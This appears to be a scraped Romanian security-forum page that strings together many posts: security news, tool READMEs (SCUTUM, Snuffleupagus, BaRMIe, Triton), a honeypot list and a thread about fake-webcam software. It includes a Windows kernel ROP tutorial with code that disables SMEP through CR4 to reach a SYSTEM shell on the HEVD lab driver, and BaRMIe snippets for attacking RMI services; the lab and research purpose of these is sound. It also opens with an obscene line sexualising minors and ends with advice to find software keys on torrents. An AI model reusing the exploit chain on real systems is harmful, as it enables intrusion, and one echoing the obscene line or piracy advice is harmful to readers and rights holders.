Leaderboard

gen minori fututi de cai.

cine nu se poate lasa de fumat si vrea sa citeasca, pm cu ce doreste din lista^

A group of AI experts from The University of Nottingham and Kingston University managed to create a new method by which two-dimensional images of faces can be converted into 3D using machine learning. The researchers trained a convolutional neural-network to perform the task by feeding it tons of data on people’s faces. From there it figured out how to guess what a new face looks like from an previously unseen pic, including parts that it can’t see in the photograph. The 3D computer vision project really has to be seen to be believed, and you can try it out in a nifty demo here. The website doesn’t really do the full technology justice, but it’s bloody cool. Members of the team, which consists of Aaron S. Jackson, Adrian Bulat, Vasileios Argyriou, and Georgios Tzimiropoulos, will be presenting their work next month at the International Conference on Computer Vision in Venice. Aaron Jackson told via email: "The website demonstrating it was a quick mashup over the course of a few evenings. I basically made it because I thought seeing yourself in 3D is fun. A lot of research in computer vision is hard to present in a fun way because it’s things like new methods for detecting points on a face." An artificial intelligence that can turn pictures into faces is the tip of the iceberg here. The implications go far beyond amusing technology journalists for hours at a time with a website. In reality computer vision is one of the most useful purposes for deep learning and we can’t wait to see what Jackson and his fellow developers do next. Sursa: https://safeum.com/blog/2738-this-ai-program-can-make-3d-face-models-from-a-selfie.html

See you in November at DefCamp 2017 Want to experience a conference that offers outstanding content infused with a truly cyber security experience? For two days (November 9th-10th) Bucharest will become once again the capital of information security in Central & Eastern Europe hosting at DefCamp more than 1,300 experts, passionate and companies interested to learn the “what” and “how” in terms of keeping information & infrastructures safe. Now it’s getting really close: this year's conference is only months away, and that means very early bird tickets are now available. Register Now at DefCamp 2017 (50% Off) What can you expect from the 2017 edition? 2 days full of cyber (in)security topics, GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measurements 3 stages hosting over 35 international speakers and almost 50 hours of presentations Hacking Village hosting more than 10 competitions where you can test your skills or see how your technology stands 1,300 attendees with a background in cyber security, information technology, development, management or students eager to learn How to get involved? Speaker: Call for Papers & Speakers is available here. Volunteer: Be part of DefCamp #8 team and see behind the scene the challenges an event like this can have. Partner: Are you searching opportunities for your company? Become our partner! Hacking Village: Do you have a great idea for a hacking or for a cyber security contest? Consider applying at the Hacking Village Call for Contests. Attendee: Register at DefCamp 2017 right now and you will benefit of very early bird discounts. Register Now at DefCamp 2017 (50% Off) Use the following code to get an extra 10% discount of the Very Early Bird Tickets by June 27th. This is the best price you will get for 2017 edition. Code: DEFCAMP_2017_VEB_10 Website: https://def.camp/

Salut , stie cineva un fake Webcam care l-ați încercat și merge bine ? Am tot căutat pe google dar găsesc Numa prosti M-ar interesa sa meargă pe Linux dar și pe Windows e Ok dacă e bun multumesc !

SCUTUM Firewall Current Version: 2.5.2 It is now recommended to upgrade scutum with --upgrade parameter (since 2.5.2) Current Version Change log: Added Self-Upgrading Function, now users can execute self-upgrading with $ sudo scutum --upgrade Added AVALON Framework Self-Upgrading function (included when using "--upgrade" parameter) TODO: Finish up developing a stable version for SCUTUM GUI Recent Changes: Interfaces are now controlled by a new interface controller class SCUTUM GUI is now avaliable for testing Added option to choose whether to delete the installer file after installation Fixed arptables detection errors on some Linux distributions What is SCUTUM? Long story short, ARP firewall. It automatically adds gateways to the whitelist on connect and blocks everthing else to avoid potential threat. SCUTUM is an ARP firewall that prevents your computer from being ARP-spoofed by other computers on LAN. SCUTUM controls "arptables" in your computer so it accepts ARP packets only from the gateway. This way, when people with malicious intentions cannot spoof your arp table. SCUTUM also prevents other people from detecting your device on LAN if SCUTUM is used with properly configured TCP/UDP firewall. SCUTUM is also capable of handling tcp/udp/icmp traffic with iptables. You can choose to enable this feature during installation. However, a more professional firewall controller like UFW is recommended. They can handle traffic with more precision. Usage & Installation You should run a installation before running it for the first time for setting up configuration files. I am not sure if portable version is necessary. If you think this should be changed, raise an issue and I will change it. Installation git clone https://github.com/K4YT3X/SCUTUM.git cd SCUTUM/ sudo python3 scutum.py --install # scutum.py deletes itself after installation cd ../ rm -rf SCUTUM/ GUI Usage ENABLE: Enable SCUTUM (Start spontaneously) DISABLE: Disable SCUTUM (Never start spontaneously) DISABLE (Temporarily): Disable SCUTUM until the next time connected to a network Usage This should be easy SCUTUM starts automatically by itself after installation $ sudo scutum # Start SCUTUM Normally $ sudo scutum --start # Start SCUTUM Manually for once even it it's disabled $ sudo scutum --enable # Enable SCUTUM (Start automatically on connect) $ sudo scutum --disable # Disable SCUTUM (Don't start automatically on connect) $ sudo scutum --reset # Reset SCUTUM (Allow ALL ARP packages temporarily) $ sudo scutum --purgelog # Purge SCUTUM logs $ sudo scutum --install # Run scutum installation wizard and install SCUTUM into system $ sudo scutum --uninstall # Remove SCUTUM from system completely $ sudo scutum --upgrade # Upgrade SCUTUM and AVALON Framework SCUTUM Workflow postconnect Connect to Wi-Fi Accept all ARP packets Cache gateway MAC address by establishing a socket connection with a timeout of 0 Add Gateway MAC to exception DROP all ARP packets [Finished] postdisconnect Accept all ARP packets [Finished] Download: SCUTUM-master.zip or: git clone https://github.com/K4YT3X/SCUTUM.git Source: https://github.com/K4YT3X/SCUTUM

Apple yesterday rolled out a new version of its macOS operating system, dubbed High Sierra 10.13—a few hours before an ex-NSA hacker publicly disclosed the details of a critical vulnerability that affects High Sierra as well as all earlier versions of macOS. Patrick Wardle, an ex-NSA hacker and now head of research at security firm Synack, found a critical zero-day vulnerability in macOS that could allow any installed application to steal usernames and plaintext passwords of online accounts stored in the Mac Keychain. The macOS Keychain is a built-in password management system that helps Apple users securely store passwords for applications, servers, websites, cryptographic keys and credit card numbers—which can be accessed using only a user-defined master password. Typically no application can access the contents of Keychain unless the user enters the master password. The security flaw actually resides in macOS's kernel extension SKEL (Secure Kernel Extension Loading) security feature, which was disclosed earlier this month, allowing an attacker to run any third-party at kernel level extension without requiring user approval. Wardle yesterday posted a proof-of-concept video of the exploit, demonstrating how the hack can be used to exfiltrate every single plaintext password from Keychain without requiring the user to enter the master password. The video shows how a malicious installed application, signed or unsigned, allowed an attacker to remotely steal all the passwords stored in the keychain and does not notify the user of the attack either. Wardle claimed that he reported the issue to Apple last month, and made the public disclosure when the company planned to release High Sierra without fixing the vulnerability, which not only affects the newest version but also older versions of macOS. Via thehackernews.com

Da l-am încercat eu ieri și mergea perfect doar ai grija ce difuzezi

Snuffleupagus is a PHP 7+ module designed to drastically raising the cost of attacks against website, by killing entire bug classes, and also providing a powerful virtual-patching system, allowing administrator to fix specific vulnerabilities and audit suspicious behaviours without having to touch the PHP code. Snuffleupagus has a lot of features that can be divided in two main categories: bug-classes killers and virtual-patching. The first category provides primitives to kill various bug families (like arbitrary code execution via unserialize for example) or rise the cost of exploitation, the second one is a highly configurable system to patch functions in php itself. Link: https://snuffleupagus.readthedocs.io/

Da, nu e mare branza. Totusi ca si modul de PHP nu prea pot face ceva solutie generala si eficienta. Nu e facut sa fie folosit enterprise sau oricine altcineva care vrea securitate. Eu ii vad locul pe ceva siteuri mici care nu isi permit sa angajeze developeri sau sa faca pentest si vor ceva rapid, usor de instalat si ce ofera un oarece sentiment (fals) de securitate.

Da, interesant, cuvinte mari... "We’re kind of killing it by filtering the $, |, ;, ` and & chars in our default configuration, making it a lot harder for an attacker to inject arbitrary commands." -> Si daca aceste caractere sunt folosite in mod constient de developer? Modulul poate crea probleme. La urma urmei, nu prea ai cum sa "kill a bug class" cat timp limbajul iti permite acel "bug class". De exemplu, in Java, pentru a rula un proces de sistem cu "ProcessBuilder", trebuie sa ii dai ca parametri un List<String>, adica un vector unde primul element e comanda (e.g. ls, cat etc.) iar fiecare parametru urmator e un argument. Nu tine cont ca acel parametru contine spatii sau caractere speciale, e tratat ca un argument, ofera un fel de de "Prepared Statements" pentru executia de procese. "The goto payload for XSS is often to steal cookies. Like Suhosin, we are encrypting the cookies with a secret key, the IP of the user and its user-agent. This means that an attacker with an XSS won’t be able to use the stolen cookie, since he (often) can’t spoof the IP address of the user." -> Oare face doar """encryptie""", care e mult prea mult spus daca e vorba doar de adresa IP si de user-agent, sau verifica si adresa IP pe server? "This feature can’t be deployed on websites that already stored serialized objects (ie. in database)" -> Cred ca acesta e cel mai comun caz, din pacate. Abordarea este interesanta, instalezi un modul si ai scapat de probleme. Insa din motive logice, nu este si nu o sa fie niciodata de ajuns. Problema pleaca de mai sus, daca ii permiti unui user sa faca rahaturi, si nu il fortezi sa scrie cod sigur, o sa ai probleme.

Return Oriented Programming Tutorial Hi in this tutorial we will go throw a very basic way of creating a ROP (Return Oriented Programming) Chain in order to bypass SMEP and get kernel mode execution on latest windows installation despite microsoft mitigation's. Setup: This tutorial is meant to be an active tutorial meaning that its best you will download the binary provided for the tutorial and experiment on your own with the main idea's presented. So this is what you will need in order to run the full tutorial by your own: HEVD: download from here. Windows 10 RS3 Here. WinDbg & Symbols: * kd. Symbols. Hyper-V: * How To unable hyper-v. Setup File sharing beetwin the machine and the host:* Setup File Sharing.. My Debug Binary: * download link.. Introduction: Return Oriented Programming (in the computer security context) is a technique used to bypass certain defence mechanisms, like DEP (Data execution Prevention) & SMEP. if you would like to read more about smep you can check out the link at the main README.md file of this project. the main charicteristic of this method is that instead of running pure shell code directlly from a user supplied buffer we instead use small snipets of code called gadgets. say for example i want to place 0x1FA5 in rsp, useally i will simply write in my shellcode: mov rsp, 0x1FA5 instead when using rop we will try to find some address in memory (this can be a dll an exe image or the kernel image), that will do exactly the same. and instead of writing it in the payload we will place that memory address of that function to be executed instead. so lets say i know that at a certain Offset from the base address of some dll say hal.dll there is a good instruction, then assuming that i can get code execution if i will pass the address of that function to the exploit target on runtime it will get executed. when building a rop chain the chain will be computed from many small gagdets like this one, you can think a bout it like shellcoding with snippets from other executable memory. here is a little snippent to visualize this: so in that picture as an example we will send to our exploit target a buffer that contains: hal+0x6bf0 followed by hal+0x668e .. and so on. You may ask yourself: why would we want to do that? why not simply write the shellcode as is? Well if you can simply write the shellcode as is then it is far easy to do that, but as mentioned b4 it may not allways be possible. so lets say a little about smep. smep is a security massure that uses hardware features in order to protect the endpoint from exploits such as kernel exploits. the main idea is to mark eache page allocated in the memory as eather kernel address space (K-executable/r/w) or user space. this way when the kernel executes code that code address is being checked (if the hardware offers that possiblety) if its a user space address or kernel mode address. if it was found that the code is marked as user space the kernel will stop the execution flow with a critical error, bsod. so if we will simply try to exploit a stack overflow like we did on windows 7, we will get this outcome: so the main idea in rop is to make the execution flow throw a kernel executable address that can pass the check until we can execute our own payload. enough talk lets debug!!! assuming that you have set up the environment as stated above, and you have a working machine, then open an administrator command, and type as follow: b4 running anything hit break on the debugger (open debug window and click break), next open view -> registers. scoll all the way down and the resault should be: next up type g and hit enter the machine should be running as normal, run the sample exe that i have provided, you should get a break point and this output should go on the debugger: as you can see this break point is different from the one we hit b4. first take a look at the address that triggered the break point: at the break point b4 we hit : 0xfffff80391595050 cc int 3 and now we got: Break instruction exception - code 0x80000003 (first chance) 0x0000017039f00046 cc int 3 as you can see the first address is a kernel space address and the second a user address. this is becouse i have place xcc in my shellcode. next up open the registers again the outcome should be as follows: you may ask yourself, why is cr4 register changed and how is it that we do not get the bsod msg as b4? well becouse the binary build a rop chain as follows: // To better align the buffer, // it is usefull to declare a // memory structure, other-wise you will get holes // in the buffer and end up with an access violation. typedef struct _RopChain { PUCHAR HvlEndSystemInterrupt; PUCHAR Var; PUCHAR KiEnableXSave; PUCHAR payload; // PUCHAR deviceCallBack; } ROPCHAIN, *PROPCHAIN; // Pack The buffer as: ROPCHAIN Chain; // nt!HvlEndSystemInterrupt+0x1e --> Pop Rcx; Retn; Chain.HvlEndSystemInterrupt = Ntos + 0x17d970; // kd> r cr4 // ...1506f8 Chain.Var = (PUCHAR)0x506f8; // nt!KiEnableXSave+0x7472 --> Mov Cr4, Rcx; Retn; Chain.KiEnableXSave = Ntos + 0x434a33; meaning that we have sent the vuln driver a stack overflow buffer, but instead of supplying our shell code we have given the driver the buffer above that is first composed of: Pop Rcx <-- kernel mode address Retn 0x506f8 Mov Cr4, Rcx Retn (ShellCodeAddress) So basically we have "jump" to our shellcode from other kernel mode address's so we did not got the bsod, simply cuz we have given the kernel a kernl-mode address so we passed the check, next up we flipped the bit on the cr4 register value to trick the system that smep is not supported on the firmware. we can see that by running kv command. you can see the kernel mode address on the stack call and can see the execution flow, as well as the nop's we have placed in our buffer. hit g again and you should see the below outcome: as you can see we have hit access violation, this is becouse in this demo i did not fix the return address pointer, so we can do this together, hit r on the debugger: as you can see the stack is a mess & the registers as well, the return address try's to read a pointer from rax, that is pointing to zero address, so we got access violation. so like we had to "jump" to our shell code to avoid SMEP, we need to jump back to a reasonable state, but how can we know what is a good address to jump back to? when we looked at the stack b4 we could see the execution flow, So 0x00007fffb29013aa the lowest address called the ioctl then we got to our shellcode from the overflow (the nop's), a good thing to do would be to make a return to one of our original call's on the stack to resume execution. if we take a look at 0x00007fffb29013aa we can see its marked as UREV user executable, so if we will jump to that address we will be in the same situation as b4 (bsod) so we need to find another place on the stack to jump to. lets see about nt!IofCallDriver+0x59 that is on the stack as well, we can even see what code is contained at this location running the below command: So we can see that this function simply returns back to the caller and is also KREV kernel exec. so it will be a good choise. while i was finding gadgets i was doing exactly the same, looking for KREV address that contain good code for me like mov cr4, rcx. with the 'u' command on the kd. ok, but how can we jump to that address? open up the registers again and copy the first instruction address in the output of kd> u nt!IofCallDriver+0x59 as follows: place it in rip (in view registers..) now hit g again. back in box you should have a command running as local system. So this is the end of the tutorial, i hope it will be usefull, now you know a bit more about ROP, and got some basic tools to build your own rop chain. my example code can be found here: C0de. and i challenge you to fix the return address programmatically! for more information please go to the main readme of this project and go to the links provided (how to find gadgets rop smep.. etc..) Sursa: https://github.com/akayn/demos/tree/master/Tutorials

If you’re a target for either financially motivated cyber-criminals, or nation state grade attackers, chances are your security team feels outgunned — the bad guys have the time, the skills, and the resources to affect a data-breach, and they only have to succeed once, while your security team has to get it right every time. What if you could turn the tables on them? Deception technology excels at detecting these attacks by shifting the cognitive, economic and time costs of the attack back onto the attacker. The principles of deception have been around for years, and recently, they’ve become the secret weapon of purple teams and threat hunters worldwide. The good news is, you can get started seeing the benefits of deception for free using a plethora of open-source honeypots that you can deploy immediately. We’re firm believers that deception is so crucial to detecting lateral movement, uncovering privilege escalation, and building threat intelligence, that any deception, even old-school honeypots are valuable. Whenever we’re on the road, we make it a point to give a shout-out to some of these tools, and will happily help you plan how you can use them. For free, no strings attached. Just get in touch! Caveat Emptor: You get what you pay for — Some of these tools may no longer be supported, and will require leg-work to get going, but they’re a great way to get familiar with deception. They’re also emulations, not real systems, so don’t expect high-interaction activity. While we’ll offer friendly advice around how you can use them, we don’t officially support them. For more on planning effective deception, check out our strategy focused blog-posts: 10 Questions To Ask Your Deception Provider 7 Deadly Sins – How to Fail at Implementing Deception Network services Cowrie – Cowrie is an SSH honeypot based off an earlier favourite called Kippo. It will emulate an interactive SSH server with customisable responses to commands. Another alternative is HonSHH which sits between a real SSH server and the attacker, MiTMing the connection and logging all SSH communications. Dionaea is a multi-protocol honeypot that covers everything from FTP to SIP (VoIP attacks). Where it really excels is for SMB decoys. It can even simulate malware payload execution using LibEmu to analyse multi-part stagers. IOT (Internet of Things) decoys Honeything emulates the TR-069 WAN management protocol, as well as a RomPager web-server, with vulnerabilities. Other IoT decoys can be created by emulating embedded telnet / FTP servers, for example with BusyBox. SCADA/ICS decoys ConPot emulates a number of operational technology control systems infrastructure, including protocols like MODBUS, DNP3 and BACNET. It comes with a web-server that can emulate a SCADA HMI as well. GasPot emulates a Veeder Root Gaurdian AST that is commonly used for monitoring in the oil and gas industry. Database and NoSQL honeypots MongoDB-HoneyProxy emulates an insecure MongoDB database. Hackers regularly scan the interwebs looking for administrators who had an ‘oops moment’ and exposed their DB to the world. ElasticHoney emulates an ElasticSearch instance, and looks for attempted remote code execution. Credential honeypots and honeytokens DCEPT by Dell SecureWorks places deceptive credentials in Microsoft’s Active Directory. Canarytokens by the great guys at Thinkst let you place different types of decoy data across your systems, waiting for an attacker to trigger them. Honeyclients and malware analysis Thug is a ‘honeyclient’ that mimics the behaviour of a web-browser to analyse client-side exploits. It can be used to analyse dodgy links, determining whether they serve up malicious JavaScript, ActiveX or Flash components. It can download payload samples and integrates with VirusTotal to analyse what gets served. Cuckoo Sandbox is not really a honeypot, but it’s a great sandbox for malware analysis. You can safely and programmatically execute possible malware samples, including binaries, Microsoft Office documents and emails within a Cuckoo VM and receive a full report on what code executed, what file / registry changes were made, and what network callbacks were observed. Pair it with VMCloak to automatically build sandbox VM’s that are harder for malware to fingerprint. All-in-One Honeydrive is a GNU/Linux distribution that comes pre-installed with a lot of active defence capabilities. Consider it the anti-Kali. MHN combines Snort, Kippo, Dionaea and Conpot, and wraps them for easy installation and use. Setting up most of these in a lab should be a fairly simple weekend project for the seasoned security professional. You can then run red-team style attacks against them to figure out exactly what sort of telemetry you can expect. Finally, you can tweak the source to reduce how easily they can be fingerprinted (don’t forget to submit patches to the authors if you do). If you’d like to take the next step with professional deception technology, check out our IllusionBLACK platform by seeing a live demo. Sursa: https://www.smokescreen.io/practical-honeypots-a-list-of-open-source-deception-tools-that-detect-threats-for-free/

BaRMIe BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services. RMI services often expose dangerous functionality without adequate security controls, however RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after, however even with those tools a successful zero-knowledge attack relies on a significant brute force attack (~64-bits/9 quintillion possibilities) being performed over the network. The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64-bits over the network. Download version 1.0 built and ready to run here: https://github.com/NickstaDB/BaRMIe/releases/download/v1.0/BaRMIe_v1.0.jar Disclaimer BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program. Usage Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information. $ java -jar BaRMIe.jar ▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████ ▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀ ▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███ ▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄ ░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒ ░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░ ▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ v1.0 Java RMI enumeration tool. Written by Nicky Bloor (@NickstaDB) Warning: BaRMIe was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program. Usage: BaRMIe -enum [options] [host] [port] Enumerate RMI services on the given endpoint(s). Note: if -enum is not specified, this is the default mode. BaRMIe -attack [options] [host] [port] Enumerate and attack the given target(s). Options: --threads The number of threads to use for enumeration (default 10). --timeout The timeout for blocking socket operations (default 5,000ms). --targets A file containing targets to scan. The file should contain a single host or space-separated host and port pair per line. Alternatively, all nmap output formats are supported, BaRMIe will parse nmap output for port 1099, 'rmiregistry', or 'Java RMI' services to target. Note: [host] [port] not supported when --targets is used. Reliability: A +/- system is used to indicate attack reliability as follows: [+ ]: Indicates an application-specific attack [- ]: Indicates a JRE attack [ + ]: Attack insecure methods (such as 'writeFile' without auth) [ - ]: Attack Java deserialization (i.e. Object parameters) [ +]: Does not require non-default dependencies [ -]: Non-default dependencies are required Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint. Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services. A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output. No Vulnerable Targets Identified? Great! This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI so contributions will go a long way in improving BaRMIe and the security of RMI services. If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future. Alternatively, get in touch, and provide as much detail as possible including BaRMIe -enum output and ideally the relevant JAR files. Attack Types BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door. 1. Attacking Insecure Methods The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this: //Get a reference to the remote RMI registry service Registry reg = LocateRegistry.getRegistry(targetHost, targetPort); //Get a reference to the target RMI object Foo bar = (Foo)reg.lookup(objectName); //Call the remote executeCommand() method bar.executeCommand(cmd); 2. Deserialization via Object-type Paraeters Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below: public void setOption(String name, Object value); public void addAll(List values); 3. Deserialization via Illegal Method Invocation Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below: public void setName(String name); public Long add(Integer i1, Integer i2); public void sum(int[] values); The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them. Sursa: https://github.com/NickstaDB/BaRMIe

Subgraph OS: Adversary resistant computing platform Subgraph OS is a desktop computing and communications platform that is designed to be resistant to network-borne exploit and malware attacks. It is also meant to be familiar and easy to use. Even in alpha, Subgraph OS looks and feels like a modern desktop operating system. Subgraph OS includes strong system-wide attack mitigations that protect all applications as well as the core operating system, and key applications are run in sandbox environments to reduce the impact of any attacks against applications that are successful. Subgraph OS was designed to reduce the risks in endpoint systems so that individuals and organizations around the world can communicate, share, and collaborate without fear of surveillance or interference by sophisticated adversaries through network borne attacks. Subgraph OS is designed to be difficult to attack. This is accomplished through system hardening and proactive, ongoing research on defensible system design. CLICK TO EXPLORE SUBGRAPH OS Hardened kernel built with grsecurity, PaX, and RAP Subgraph OS includes a kernel hardened with the well-respected grsecurity/PaX patchset for system-wide exploit and privilege escalation mitigation. In addition to making the kernel more resistant to attacks, grsecurity and PaX security features offer strong security protection to all processes running without modification (i.e. recompiling / relinking). The Subgraph OS kernel is also built with the recently released RAP (demo from the test patch) security enhancements designed to prevent code-reuse (i.e. ROP) attacks in the kernel. This is an important mitigation against contemporary exploitaion techniques and greatly increases the resistance of the kernel to modern exploits that can be used to escalate privileges once an application on the endpoint is breached. grsecurity, PaX, and RAP are essential defenses implemented in Subgraph OS. The Subgraph OS kernel (4.9) is also built with fewer features to the extent possible producing a widely-usable desktop operating system. This is done to proactively reduce kernel attack surface. INFORMATION ABOUT THE SUBGRAPH OS KERNEL Sandboxed applications Subgraph OS runs exposed or vulnerable applications in sandbox environments. This sandbox framework, known as Oz, unique to Subgraph OS, is designed to isolate applications from each other and the rest of the system. Access to system resources are only granted to applications that need them. For example, the PDF viewer and the image viewer do not have access to any network interface in the sandbox they're configured to run in. The technologies underlying Oz include Linux namespaces, restricted filesystem environments, desktop isolation, and seccomp bpf to reduce kernel attack surface through system call whitelists. Subgraph is regularly instrumenting applications and libraries to limit the exposed kernel API to what is necessary for each sandboxed application to function. Many applications only need about one-third to one-half of the available system calls to function, and the Subgraph Oz sandbox framework ensures that the unnecessary system calls cannot be invoked (Oz can and often does restrict system calls to specific known parameters to further narrow kernel attack surface through system calls such as ioctl(2)). Subgraph OS will soon be using gosecco, a new library for seccomp-bpf that lets policies be expressed in a format that is more efficient, cross-platform, and understandable to humans. Sandboxed applications include: Web browser Email client with built-in support for encryption CoyIM instant messenger LibreOffice productivity suite PDF viewer Image viewer Video player Hexchat SANDBOX TECHNICAL WALKTHROUGH Memory Safety Most custom code written for Subgraph OS is written in Golang, which is a memory safe language. Golang libraries are also often implemented in pure Golang, which is in contrast to other popular languages such as Python. While the Python runtime may be memory safe, the C languages wrapped by so many of the commonly used libraries expose tools written in Python to the same old memory corruption vulnerabilities. Application firewall Subgraph also includes an application firewall that will detect and alert the user to unexpected outbound connections by applications. The Subgraph application firewall is fairly unique to Linux-based operating systems and is an area of ongoing development. MORE SCREENSHOTS OF SUBGRAPH OS Other security features Subgraph OS is constantly improving and hardening the default security state of the operating system. This includes making configuration enhancements and adding entirely new mitigations. Additional security features in Subgraph OS include: AppArmor profiles covering many system utilities and applications Security event monitor and desktop notifications (coming soon) Roflcoptor tor control port filter service Port to new seccomp-bpf golang library Gosecco Hardened Subgraph OS is based on a foundation designed to be resistant to attacks against operating systems and the applications they run. MORE Anonymized Subgraph OS includes built-in Tor integration, and a default policy that sensitive applications only communicate over the Tor network. MORE Secure communication Subgraph OS ships with a new, more secure IM client, and an e-mail client configured by default for PGP and Tor support. MORE Alpha release availability Try the Subgraph OS Alpha today. You can install it on a computer, run it as a live-disk, or use it in a VM. TRY SUBGRAPH OS ALPHA Sursa: https://subgraph.com/index.en.html

via : https://micahflee.com/2017/04/breaking-the-security-model-of-subgraph-os/ ... stiu autorul e implicat in echipa Qube OS

ADS stands for Alternate Data Stream. It is a file attribute only found on the NTFS file system. ADS is the lesser known feature of Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. It is used legitimately by Windows and other applications to store additional information (for example summary information) for the file. Even 'Internet Explorer' adds the stream named 'Zone.Identifier' to every file downloaded from the internet. ADS have been given a bad reputation because their capability to hide data from us on our own computer, has been abused by malware writers in the past. More info: Technet Microsoft Blog Malware Bytes Blog on ADS ADS on rootkitanalytics.com More on NTFS Tool to identify ADS on Windows Systems: ADS-Revealer Stay safe!

Stealing Windows Credentials Using Google Chrome Author/Researcher: Bosko Stankovic (bosko defensecode.com) http://www.defensecode.com Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the internet was recently presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference[1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. Download: https://www.exploit-db.com/docs/42015.pdf

Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint Engine, AST representations of the x86 and the x86-64 instructions set semantics, SMT simplification passes, an SMT Solver Interface and, the last but not least, Python bindings. Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please, don't blame us if it is not yet reliable. Open issues or pull requests are always better than troll =). A full documentation is available on our doxygen page. Quick start Description Installation Examples Presentations and Publications Internal documentation Dynamic Symbolic Execution Symbolic Execution Optimizations AST Representations of Semantics SMT Semantics Supported SMT Solver Interface SMT Simplification Passes Spread Taint Tracer Independent Python Bindings News A blog is available and you can follow us on twitter @qb_triton or via our RSS feed. Support IRC: #qb_triton@freenode Mail: triton at quarkslab com Authors Jonathan Salwan - Lead dev, Quarkslab Pierrick Brunet - Core dev, Quarkslab Florent Saudel - Core dev, Bordeaux University Romain Thomas - Core dev, Quarkslab Cite Triton @inproceedings{SSTIC2015-Saudel-Salwan, author = {Florent Saudel and Jonathan Salwan}, title = {Triton: A Dynamic Symbolic Execution Framework}, booktitle = {Symposium sur la s{\'{e}}curit{\'{e}} des technologies de l'information et des communications, SSTIC, France, Rennes, June 3-5 2015}, publisher = {SSTIC}, pages = {31--54}, year = {2015}, } Sursa: https://github.com/JonathanSalwan/Triton

Imd o sa ajung acasă și o sa încerc @Dragos @Fi8sVrs mulțumesc am încercat cu fake Webcam v7 dar după 2 Live nu mai îmi citea Google chrome programul

Încearcă https://obsproject.com/. L-am folosit prin martie pentru livestream pe YT și a mers super ok. Merge pe Win, Mac și Linux. Poți să setezi o ieșire de cameră în care să fie ce vrei tu, camera proprie, o imagine, un video și la fel și pentru sunet.

ManyCam 4.0.52 - versunile vechi, cauta pe uptodown.com

Mersi o sa caut o versiune veche pe filelist nu am găsit decât un program și nu merge

exista pe net, am avut nevoie acum 2 luni, doar ca trebuie sa cauti versiuni mai vechi la care gasesti key. Nu mai tin minte numele la program. Cauta pe torrente

// solved WP @Fi8sVrs

